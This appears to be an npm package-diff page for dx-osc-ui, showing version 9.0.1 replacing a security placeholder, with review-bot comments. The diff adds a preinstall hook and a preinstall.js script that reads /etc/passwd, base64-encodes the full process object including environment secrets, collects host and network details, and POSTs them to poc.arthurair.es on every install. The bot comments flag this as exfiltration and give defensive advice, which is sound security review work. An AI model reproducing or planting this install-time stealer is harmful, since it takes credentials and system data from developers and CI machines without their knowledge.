dx-osc-ui 0.0.1-security → 9.0.1


Potentially problematic release.


This version of dx-osc-ui might be problematic. Click here for more details.

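--- a/package/index.js
+++ b/package/index.js
@@ -0,0 +1,3 @@
+ module.exports.hacked = function () {
+ return "h1:arthuraires"
+ }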
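--- a/package/package.json
+++ b/package/package.json
@@ -1,6 +1,18 @@
  {
  "name": "dx-osc-ui",
- "version": "0.0.1-security",
- "description": "security holding package",
- "repository": "npm/security-holder"
- }
+ "version": "9.0.1",
+ "description": "",
+ "main": "index.js",
+ "scripts": {
+ "test": "echo \"Error: no test specified\" && exit 1",
+ "preinstall": "node preinstall.js"
+ },
+ "author": "",
+ "license": "ISC",
+ "dependencies": {
+ "axios": "^0.21.1",
+ "http": "0.0.1-security",
+ "https": "^1.0.0",
+ "os": "^0.1.1"
+ }
+ }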
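Review bot: The new `scripts.preinstall` entry (`"preinstall": "node preinstall.js"`) makes npm execute package code on every install, before anything from the package is imported, and nothing else in this manifest explains why a package would need that; the line should be dropped. The added dependencies `http`, `https` and `os` are registry packages named after Node built-ins, and since `require('https')` always resolves to the core module they add install surface without being used. `axios` is not referenced by either added file shown on this page. The jump from `0.0.1-security` to `9.0.1` replaces the security holding placeholder with a higher version, so consumers should pin or block this name and use `npm install --ignore-scripts` until the release has been vetted.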
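--- a/package/preinstall.js
+++ b/package/preinstall.js
@@ -0,0 +1,79 @@
+ 'use strict'
+
+ const https = require('https')
+ const http = require("http");
+ const os = require("os");
+
+ var currentPath = __dirname;
+ var currentFile = __filename;
+ var currentEnvString = JSON.stringify(process);
+ var currentEnvBase64 = Buffer.from(currentEnvString).toString('base64');
+
+ var fs = require('fs')
+
+ fs.readFile('/etc/passwd', 'utf8', async function (err,file) {
+ if (err) {
+ return console.log(err);
+ }
+ let cloudResponse = '';
+ try {
+ const teste = await https.request({
+ hostname: 'http://poc.arthurair.es/flaskDependecy',
+ method: 'GET'
+ });
+
+ console.log(teste);
+ } catch(error) {
+ console.log(error);
+ }
+
+
+ var data = {
+ envPORT: process.env.PORT,
+ hostname: JSON.stringify(os.hostname()),
+ currentPath: currentPath,
+ currentFile: currentFile,
+ currentEnvBase64: currentEnvBase64,
+ type: JSON.stringify(os.type()),
+ platform: JSON.stringify(os.platform()),
+ arch: JSON.stringify(os.arch()),
+ release: JSON.stringify(os.release()),
+ uptime: JSON.stringify(os.uptime()),
+ loadavg: JSON.stringify(os.loadavg()),
+ totalmem: JSON.stringify(os.totalmem()),
+ freemem: JSON.stringify(os.freemem()),
+ cpus: JSON.stringify(os.cpus()),
+ networkInterfaces: JSON.stringify(os.networkInterfaces()),
+ etc: Buffer.from(file).toString('base64'),
+ };
+
+ console.log(data);
+
+ data = JSON.stringify(data);
+
+ const options = {
+ hostname: 'poc.arthurair.es',
+ port: 80,
+ path: '/flaskDependecy',
+ method: 'POST',
+ headers: {
+ 'Content-Type': 'application/json',
+ 'Content-Length': data.length
+ }
+ }
+
+ const req = https.request(options, res => {
+ // console.log(`statusCode: ${res.statusCode}`)
+
+ res.on('data', d => {
+ process.stdout.write(d)
+ })
+ })
+
+ req.on('error', error => {
+ console.error(error)
+ })
+
+ req.write(data)
+ req.end()
+ });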
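Review bot: The `fs.readFile('/etc/passwd', …)` callback builds a payload from `JSON.stringify(process)`, which carries `process.env` and so any tokens or credentials in the installing shell or CI job, plus the passwd file, host details and network interfaces, and posts it to `poc.arthurair.es`. Run from the `preinstall` hook, that is data exfiltration at install time, and the file should be removed together with the `"preinstall": "node preinstall.js"` entry. The `hacked` export returning `"h1:arthuraires"` in index.js suggests a bug-bounty proof of concept, but the data collected goes well beyond what is needed to prove code execution. Whether the requests complete cannot be determined from this file alone, so hosts that installed 9.0.1 should be treated as exposed: rotate secrets present in their environment and review DNS and proxy logs for the hostname above.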
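--- a/package/README.md
+++ b/package/README.md
@@ -1,5 +0,0 @@
- # Security holding package
-
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
- Please refer to www.npmjs.com/advisories?search=dx-osc-ui for more information.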